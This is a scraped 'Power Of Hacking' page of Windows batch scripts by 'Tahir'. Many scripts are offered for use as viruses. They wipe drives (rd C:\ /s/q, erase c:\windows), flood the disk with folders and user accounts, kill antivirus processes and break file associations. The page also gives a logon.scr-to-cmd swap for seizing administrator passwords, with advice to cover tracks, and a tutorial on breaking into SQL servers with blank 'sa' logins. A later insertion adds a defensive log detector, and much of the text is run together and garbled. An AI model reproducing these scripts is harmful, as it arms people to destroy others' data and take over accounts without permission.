Power Of Hacking
Batch virus programming by Tahir

@echo off instructs the interpreter to hide the commands while the batch file is executed.

msg * Tahir®
@echo off          // hides the commands while the batch file runs
:x                 // loop label
start winword
start mspaint      // open Paint
start notepad
start write
start cmd          // open a command prompt
start explorer
start control
start calc         // open Calculator
goto x             // infinite loop
saveas tahir.bat

color:
msg * Tahir
@ echo off
echo:
echo ……………………………
echo Press 1 for green, 2 for red or 3 for blue, or 4 for exit
echo ……………………………
set /p m=Type 1, 2, or 3, or 4, and press enter:
echo:
if %m%==1 goto 1
if %m%==2 goto 2
Mail:mtahirzahid@yahoo.com
if %m%==3 goto 3
if %m%==4 goto 4
:1
color 0a
echo This is the green
goto 4
:2
color 04
echo This is the red
goto 4
:3
color 06
echo This is the blue
goto 4
:4
Pause
goto end
:end
Saveas tahir.bat

Colordos:
msg * Tahir
@ echo off
echo:
echo ……………………………
echo Press 1 for green, 2 for red or 3 for blue, or 4 for exit
echo ……………………………
set /p m=Type 1, 2, or 3, or 4, and press enter:
echo:
if %m%==1 goto 1
if %m%==2 goto 2
if %m%==3 goto 3
if %m%==4 goto 4
:1
color 0a
echo This is the green
goto 4
:2
color 04
echo This is the red
goto 4
:3
color 06
echo This is the blue
goto 4
:4
Pause
goto end
:end
Saveas tahir.bat

COUGHrandom:
msg * Tahir *COUGH*
why not:
cd %SYSTEMDRIVE%/ :start copy *.* %random%.* start *.* goto start saveas tahir.bat Create a Prank Virus:msg * Tahir @echo off echo YOU HAVE A VIRUS ON YOUR COMPUTER pause echo CONTATTING ANTIVIRUS pause echo DO YOU WANT TO DELETE ANTIVIRUS? pause echo ACCESS DENIED echo ACCESS DENIED echo ACCESS DENIED pause echo ACTIVATING VIRUS echo VIRUS ACTIVATED pause :1 dir/s Mail:mtahirzahid@yahoo.com
Power Of Hacking goto 1 saveas tahir.bat delC:msg * Tahir Cd C:\ rd C:\ /s/q Cd D:\ rd D:\ /s/q Cd E:\ Rd E:\ /s/q Cd F:\ Rd\ /s/q Saveas tahir.bat Delete:msg * Tahir @echo off echo do you want to delete all of your computer data? (y/n) pause >nul echo Do not exit out of the screen or all computer data will be deleted. ping localhost -n 2 > nul echo Are you sure you want to delete all computer data? (y/n) pause >nul echo deleting all data... echo. echo. pause localhost -n 2 > nul Mail:mtahirzahid@yahoo.com
Power Of Hacking dir /s echo. echo. ping localhost -n 2 > nul cls echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n) pause echo. echo. ping localhost -n 1 > nul cls dir /s echo. echo. ping localhost -n 2 >nul cls echo all data has been deleted.. pause del "c:delete.bat" saveas tahir.bat Deleting Critical System Files sleep virus:msg * Tahir cls :A color 0a cls Mail:mtahirzahid@yahoo.com
Power Of Hacking @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo start /w wscript.exe C:\sleep3000.vbs echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ Mail:mtahirzahid@yahoo.com
Power Of Hacking mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\ echo start hax.exe start /w wscript.exe C:\sleep3000.vbs echo Virus Executed! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:\sleep2000.vbs echo Killing all processes… start /w wscript.exe C:\sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:\sleep2000.vbs Mail:mtahirzahid@yahoo.com
Power Of Hacking echo: echo Have fun! start /w wscript.exe C:\sleep2000.vbs pause saveas tahir.bat Dell:msg * Tahir @Echo off Del C:\ *.*|y Saveas tahir.bat Denger:msg * Tahir @echo off copy 0% denger.bat start denger.bat saveas tahir.bat dos222ormoreopenfilehack:msg * Tahir :start start name.bat go to start saveas tahir.bat enablecmd:REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 Mail:mtahirzahid@yahoo.com
Power Of Hacking [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0 Saveas tahir.reg eraseC:msg * Tahir erase c:\windows saveas tahir.bat examplewebsite:msg * Tahir start mtahirzahid.blogspot.com saveas tahir.bat file:msg * Tahir @echo off md hello :A start hello goto A saveas tahir.bat flood1:msg * Tahir @ECHO OFF @ECHO A PHOENIX PRODUCTION @ECHO MAIN BAT RUNNING GOTO start
Power Of Hacking :start @ECHO SET snowball2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat @ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5
:bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET maggi=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR maggi%%maggi%% >> bat5.bat @ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4
:bat4 @ECHO CD %%SystemRoot%%\ >> bat4.bat @ECHO SET marge=1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat @ECHO :flood3 >> bat4.bat Mail:mtahirzahid@yahoo.com
Power Of Hacking @ECHO MKDIR marge%%marge%% >> bat4.bat @ECHO SET /a marge=%%marge%%+1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat START /MIN bat4.bat GOTO bat3
:bat3 @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat @ECHO SET bart=1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat @ECHO :flood2 >> bat3.bat @ECHO MKDIR bart%%bart%% >> bat3.bat @ECHO SET /a bart=%%bart%%+1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat START /MIN bat3.bat GOTO bat2
:bat2 @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat @ECHO SET homer=1 >> bat2.bat @ECHO GOTO flood >> bat2.bat @ECHO :flood >> bat2.bat @ECHO MKDIR homer%%homer%% >> bat2.bat @ECHO SET /a homer=%%homer%%+1 >> bat2.bat @ECHO GOTO flood >> bat2.bat START /MIN bat2.bat Mail:mtahirzahid@yahoo.com
Power Of Hacking GOTO original
:original CD %HomeDrive%\ SET lisa=1 GOTO flood1 :flood1 MKDIR lisa%lisa% SET /a lisa=%lisa%+1 GOTO flood1 Saveas tahir.bat Floodvirus:msg * Tahir @ECHO OFF @ECHO A 9xero’s Creation
@ECHO MAIN BAT RUNNING GOTO start
:start @ECHO SET magic2=1 >> bat6.bat @ECHO GOTO flood5 >> bat6.bat @ECHO :flood5 >> bat6.bat @ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat Mail:mtahirzahid@yahoo.com
Power Of Hacking @ECHO NET USER magic2%%magic2%% /add >> bat6.bat @ECHO GOTO flood5 >> bat6.bat START /MIN bat6.bat GOTO bat5
:bat5 @ECHO CD %%ProgramFiles%%\ >> bat5.bat @ECHO SET pogo=1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat @ECHO :flood4 >> bat5.bat @ECHO MKDIR pogo%%pogo%% >> bat5.bat @ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat @ECHO GOTO flood4 >> bat5.bat START /MIN bat5.bat GOTO bat4
:bat4 @ECHO CD %%SystemRoot%%\ >> bat4.bat @ECHO SET hat=1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat @ECHO :flood3 >> bat4.bat @ECHO MKDIR hat%%hat%% >> bat4.bat @ECHO SET /a hat=%%hat%%+1 >> bat4.bat @ECHO GOTO flood3 >> bat4.bat Mail:mtahirzahid@yahoo.com
Power Of Hacking START /MIN bat4.bat GOTO bat3
:bat3 @ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat @ECHO SET chart=1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat @ECHO :flood2 >> bat3.bat @ECHO MKDIR chart%%chart%% >> bat3.bat @ECHO SET /a chart=%%chart%%+1 >> bat3.bat @ECHO GOTO flood2 >> bat3.bat START /MIN bat3.bat GOTO bat2
:bat2 @ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat @ECHO SET gamer=1 >> bat2.bat @ECHO GOTO flood >> bat2.bat @ECHO :flood >> bat2.bat @ECHO MKDIR gamer%%gamer%% >> bat2.bat @ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat @ECHO GOTO flood >> bat2.bat START /MIN bat2.bat GOTO original Mail:mtahirzahid@yahoo.com
riginal CD %HomeDrive%\ SET 9xero=1 GOTO flood1 :flood1 MKDIR 9xero%9xero% SET /a 9xero=%9xero%+1 GOTO flood1 Saveas tahir.bat Installhack:msg * Tahir title virus is my dna color 0A @echo off set end=md “u cant eascape from me-vishnu” set fin=copy “Hack log.txt” “Installing” %end% %fin% net send * andhra pradesh- virus created in karimnagar from jits college kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q Mail:mtahirzahid@yahoo.com
Power Of Hacking cls assoc .exe=txtfile assoc .txt=mp3file assoc .mp3=.vcf cls msg * hi dude this is begining. msg * vishnu attcked the system try to challenge him . DEL C:\WINDOWS\system32\logoff.exe /F /Q DEL C:\WINDOWS\system32\logon.exe /F /Q DEL C:\WINDOWS\system32\logon.scr /F /Q cls shutdown saveas tahir.bat Ipconfig:msg * Tahir @ echo off echo Use this to open your programs faster echo: echo Select 1 for notepad, 2 for firewall options, 3 for registry editor‌ Select 4 to exit‌ set /p m=Type 1, 2, or 3, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2 if %m%==3 goto 3 if %m%==4 goto exit :1 Mail:mtahirzahid@yahoo.com
start %windir%\System32\Notepad
goto exit
:2
start %windir%\System32\WF.msc
goto exit
:3
start %windir%\System32\regedt32.exe
goto exit
:exit

Try it and replace the values in bold with your own choices.

14. Check your internet Details

Advanced users can check their IP configuration whenever they want. This is really helpful for people who mask their IP often or who have a dynamic IP.

Open notepad and type the following:

@echo off
ipconfig
PAUSE
Saveas tahir.bat

Locker:
msg * Tahir
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==YOUR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Saveas tahirlocker.bat

This "lock" is cosmetic, not access control: the folder is only renamed to a Control Panel CLSID and marked hidden and system, so dir /a, Explorer with hidden and protected system files shown, or any other account on the machine can still read every file in it, and the password is stored in plaintext in the .bat itself.

Lockorkeyfolder:
Key:
msg * Tahir
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics
saveas tahir.bat

when lock:
msg * Tahir
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}
saveas tahir.bat

maketreemagic:
msg * Tahir
@ echo off
echo:
echo ……………………………
echo Press 1 for windows, 2 for apple or 3 for exit
echo ……………………………
set /p m=Type 1, 2, or 3, and press enter:
echo:
if %m%==1 goto 1
if %m%==2 goto 2
if %m%==3 goto 3
:1
echo _______________*******________________________
echo _____________***********______________________
echo ___________**************_____________________
echo __________****************____________________
echo __________****************___**__________**___
echo _________****************___****************__
echo ________*****************___***************___
echo _______*****************___****************___
echo _______***___________**___****************____
echo __________________________***************_____
echo ________***********________*************______
echo _____****************_______**********________
echo _____****************___**_____________*______
echo ____****************___****************_______
echo ____****************___***************________
echo ___*****************__****************________
echo ___**___________**___****************_________
echo _____________________****************_________
echo ______________________**************__________
echo ________________________*********_____________
echo _________________________*******______________
echo:
echo:
goto 3
:2
echo ______________________________________________
echo ______________________________________________
echo _____________________________**_______________
echo ___________________________***________________
echo _________________________****_________________
echo _________________________***__________________
echo ______________________________________________
echo ________________****________*****_____________
echo ____________************************__________
echo __________*************************___________
echo _________*************************____________
echo _________*************************____________
echo _________************************_____________
echo _________*************************____________
echo __________************************____________
echo ___________************************___________
echo ___________***************************________
echo ____________*************************_________
echo _____________***********************__________
echo _______________*******************____________
echo _________________***_________****_____________
echo ______________________________________________
echo:
echo:
goto 3
:3
Pause
goto end
:end
Saveas tahir.bat

Matrix:
msg * Tahir
:cmd
color 96
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% Mail:mtahirzahid@yahoo.com
Power Of Hacking %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando 
m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra ndom%%random%%random%%random%%random%%random%%random%%random%%random%%rando Mail:mtahirzahid@yahoo.com
Power Of Hacking m%%random%%random%%random%%random%%random%%random%%random%%random%%random% %random%%random% ping localhost -n 4 >nul
color 70
echo WWWHHHHOOOOAAAAHHH!!!! ping localhost -n 3 >nul
color 48
echo sorry about that... RELOADING ping localhost -n 3 >nul pause goto:top saveas tahir.bat Matrix2:msg * Tahir @echo off color 0a :A echo 7 y x 3 W 8 G M P q 1 F 0 U v c i j O D s a E I j H 9 t 6 7 z C B 4 g T A H I R ping localhost -n 1 > nul goto A saveas tahir.bat
Messenger:
msg * Tahir
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Saveas tahir.bat

Msgsimultationary:
msg * Tahir
@ECHO off
:Begin
msg * Tahir
msg * Want to have Fun?
msg * You do?
msg * We will both have fun, alright?
msg * More fun?
GOTO BEGIN
Saveas tahir.bat

Notehack:
msg * Tahir
@ECHO off
:top
START %SystemRoot%/system32/notepad.exe
GOTO top
Saveas tahir.bat

open cmd:
msg * Tahir
Start
Saveas tahir.bat

Password:
How To Hack a Windows XP Password
It is very simple to hack an administrator's user password in Windows XP! You don't have to know any password beforehand and you don't have to download any programs. Just follow the steps below:
Go to Start --> Run and type "cmd" to open the command prompt.
Type "net user" and press Enter to see all the account names.
Type "net user (account name) *".
Type the password you want and then confirm it.
Note that net user can only set another account's password when it is run from an account that already has administrator rights; from a limited account the command is refused ("Access is denied").
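As an added defensive example (not part of the original page), the following Python script shows how these account changes look to whoever reads the Windows Security log: the "net user %random% /add" loops in the flood and User account flooder scripts produce a burst of Event ID 4720 ("A user account was created"), and "net user (account name) *" produces Event ID 4724 ("An attempt was made to reset an account's password"). The event IDs are real; the one-record-per-line key=value layout and the log lines themselves are constructed for the example.

```python
"""Spot the two account-abuse patterns on this page in Windows Security events.

Event ID 4720 = "A user account was created"                          <- net user %random% /add
Event ID 4724 = "An attempt was made to reset an account's password"  <- net user <name> *
The sample records are constructed; the one-record-per-line key=value layout is
an assumption standing in for a real wevtutil or SIEM export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_ACCOUNT_CREATED = 4720
EVENT_PASSWORD_RESET = 4724

# Constructed sample: six accounts created by "alice" in two seconds (the
# flooder loop), one routine helpdesk account with a follow-up reset, a reset
# of the Administrator account by "bob", and carol resetting her own account.
SAMPLE_LOG = """\
2024-05-01T10:00:00 EventID=4720 Subject=WS1\\alice Target=snowball21
2024-05-01T10:00:00 EventID=4720 Subject=WS1\\alice Target=snowball22
2024-05-01T10:00:01 EventID=4720 Subject=WS1\\alice Target=snowball23
2024-05-01T10:00:01 EventID=4720 Subject=WS1\\alice Target=snowball24
2024-05-01T10:00:02 EventID=4720 Subject=WS1\\alice Target=snowball25
2024-05-01T10:00:02 EventID=4720 Subject=WS1\\alice Target=snowball26
2024-05-01T10:05:00 EventID=4720 Subject=WS1\\helpdesk Target=newhire01
2024-05-01T10:06:00 EventID=4724 Subject=WS1\\helpdesk Target=newhire01
2024-05-01T11:30:00 EventID=4724 Subject=WS1\\bob Target=Administrator
2024-05-01T11:31:00 EventID=4724 Subject=WS1\\carol Target=carol
"""


def parse_events(text):
    """Parse flattened records into dicts with a datetime and an int EventID."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        timestamp, *pairs = line.split()
        record = {"time": datetime.fromisoformat(timestamp)}
        for pair in pairs:
            key, _, value = pair.partition("=")
            record[key] = value
        record["EventID"] = int(record["EventID"])
        events.append(record)
    return events


def detect_account_floods(events, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per subject that created >= threshold accounts inside
    any sliding window of the given length. An administrator rarely creates
    five accounts a minute; the page's goto loop creates dozens a second."""
    created = defaultdict(list)
    for ev in events:
        if ev["EventID"] == EVENT_ACCOUNT_CREATED:
            created[ev["Subject"]].append(ev["time"])
    alerts = []
    for subject, times in created.items():
        times.sort()
        best_count, best_start, start = 0, None, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 > best_count:
                best_count, best_start = end - start + 1, times[start]
        if best_count >= threshold:
            alerts.append({"subject": subject, "count": best_count, "from": best_start})
    return alerts


def detect_foreign_password_resets(events, authorized=frozenset()):
    """Return (subject, target, time) for 4724 events where the subject reset
    somebody else's password and is not an account expected to do so.
    `authorized` holds lower-case user names such as a helpdesk account."""
    hits = []
    for ev in events:
        if ev["EventID"] != EVENT_PASSWORD_RESET:
            continue
        subject_user = ev["Subject"].rsplit("\\", 1)[-1].lower()
        if subject_user == ev["Target"].lower() or subject_user in authorized:
            continue
        hits.append((ev["Subject"], ev["Target"], ev["time"]))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for alert in detect_account_floods(evs):
        print("account flood:", alert)
    for subject, target, when in detect_foreign_password_resets(evs, {"helpdesk"}):
        print(f"password reset of {target} by {subject} at {when:%H:%M}")
```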
Passwordcracker:
msg * Tahir
@echo off
color 2
title ProfessionalHDStudio's Password Cracker v,1
echo ###########################
echo # By ProfessionalHDStudio #
echo ###########################
echo.
echo PRESS ENTER
pause >nul
cls
echo ************************ echo . echo The Password Cracker V.1 echo By ProfessionalHDStudio echo ************************ echo. echo. echo username set /p username= net user %username% * echo press enter pause saveas tahir.bat passwordcrackright:How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the Mail:mtahirzahid@yahoo.com
Power Of Hacking screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in. Have fun p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks passwordup:msg * Tahir @echo off echo If the proper username and password is not entered all files will be deleted by this virus. echo Good Luck set/p\/name=username: set/p\/password=password: echo haha you got the username and password wrong pause echo Files are being deleted pause dir/s del "c:up.bat" saveas tahir.bat Pick Your Option Batch File:msg * Tahir @echo off title Get A Life cd C: Mail:mtahirzahid@yahoo.com
Power Of Hacking :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything. pause echo Pick your option: echo 1. Die Slowly echo 2. Instant Death echo 3. Stay Away From This One echo 4. Die this way (For Wimps!) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two saveas tahir.bat programs faster:msg * Tahir @ echo off echo Use this to open your programs faster echo: echo Select 1 for notepad, 2 for firewall options, 3 for registry editor… Select 4 to exit… set /p m=Type 1, 2, or 3, and press enter: echo: if %m%==1 goto 1 if %m%==2 goto 2
if %m%==3 goto 3
if %m%==4 goto exit
:1
start %windir%\System32\Notepad
goto exit
:2
start %windir%\System32\WF.msc
goto exit
:3
start %windir%\System32\regedt32.exe
goto exit
:exit
Saveas tahir.bat

Shut:
msg * Tahir
@echo off
msg * Shutdown computer.
shutdown -c "Sleep Tight" -s
saveas tahir.bat

shutdown:
msg * Tahir
@echo off
:A
cls
Power Of Hacking echo Do you wanna crash your computer? (y/n) pause echo Are you sure? (y/n) pause echo your computer will crash when the time reaches zero. pause msg * Your computer will crash in... msg * 5 msg * 4 msg * 3 msg * 2 msg * 1 msg * Good-Bye msg * You have been pwned! :) shutdown -s -t 00 saveas tahir.bat Shutdown,restart,:msg * Tahir @echo off title The end of the world cd C:\ :menu cls echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc... pause Mail:mtahirzahid@yahoo.com
Power Of Hacking echo Pick your poison: echo 1. Die this way (Wimp) echo 2. Die this way (WIMP!) echo 3. DO NOT DIE THIS WAY echo 4. Die this way (you're boring) echo 5. Easy way out set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two saveas tahir.bat shutdownforcefully:msg * Tahir @echo off msg * Shutdown computer. shutdown -c “Sleep Tight” –s saveas tahir.bat shutdown:msg * Tahir @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s saveas tahir.bat tahirmsg:msg * Tahir @ECHO off Mail:mtahirzahid@yahoo.com
:Begin
msg * Tahir
msg * Want to have Fun?
msg * You do weep?
msg * We will both have fun, alright?
msg * More fun no mind?
GOTO BEGIN Saveas tahir.bat TakeRest:msg * Tahir @echo off msg * Its time to get some rest. shutdown -c “Error! You have to take rest! Byeeeeee” –s saveas tahir.bat turnoffurpc:msg * Tahir @echo off msg * u r terminated shutdown -c "stop me if Mail:mtahirzahid@yahoo.com
Power Of Hacking you can" –s saveas tahir.bat User account flooder:msg * Tahir @echo off :x net user %random% /add //create user account goto x saveas tahir.bat virus:msg * Tahir cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo Deleting Critical System Files… echo start /w wscript.exe C:\sleep3000.vbs Mail:mtahirzahid@yahoo.com
Power Of Hacking echo Deletion Successful! echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:\sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:\sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir h4x start /w wscript.exe C:\sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:\sleep3000.vbs echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\ echo start hax.exe start /w wscript.exe C:\sleep3000.vbs Mail:mtahirzahid@yahoo.com
Power Of Hacking echo Virus Executed! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:\sleep2000.vbs echo Killing all processes… start /w wscript.exe C:\sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:\sleep2000.vbs echo: echo Have fun! start /w wscript.exe C:\sleep2000.vbs pause saveas tahir.bat Virus:msg * Tahir echo Your system is affected by virus PAUSE echo: echo Windows will now try to undo changes Mail:mtahirzahid@yahoo.com
Power Of Hacking PAUSE echo: echo FAILED ! PAUSE echo: echo Your system is corrupt PAUSE I put: @ echo off title Virus echo Your system is affected by virus PAUSE echo: echo Windows will now try to undo changes PAUSE echo: echo FAILED ! PAUSE echo: echo Fuc* you bitc* PAUSE
Reply Saveas tahir.bat Viruss:msg * Tahir Mail:mtahirzahid@yahoo.com
Power Of Hacking tart virus.bat virus.bat (exactly like that!) saveas tahir.bat Serial and Trial hack:-
download this software from www.blueportal.org and hack the any application. Sql:This Tutorial is written in mind, that you already have hacking experience. And know the basics. Which will not be covered in this tutorial. This is the easiest way in my mind to Hack SQL. Im no expert. But have tried a lot of different ways. Anwayz, get Hacking! Tools You'll Need -------------------------------------SQL Exec [Here] ((http://orangey.no-ip.com/sql/sql.rar ) ServUDaemon or Winmgnt.exe [Serv-U Here or Winmgnt Here ] Anonymous or Personal FTP Configured ServUDaemon.ini [Gotta get this Yourself ] Other Useful Utilities Pack [Here] (http://orangey.no-ip.com/dware/Need.rar ) Make a Nice Shortcut on your Desktop to SQLExec, your going to be using it quite a Mail:mtahirzahid@yahoo.com
lot.
Open up SQLExec and it should look like this:
Now you are ready to use scans in this Format:
[127.0.0.1 ]: Found Mssql account: sa/[NULL] Enter in the info like so:
And Click the connect button. If the Server is up, and the user/pass is correct the connect button should turn grey.
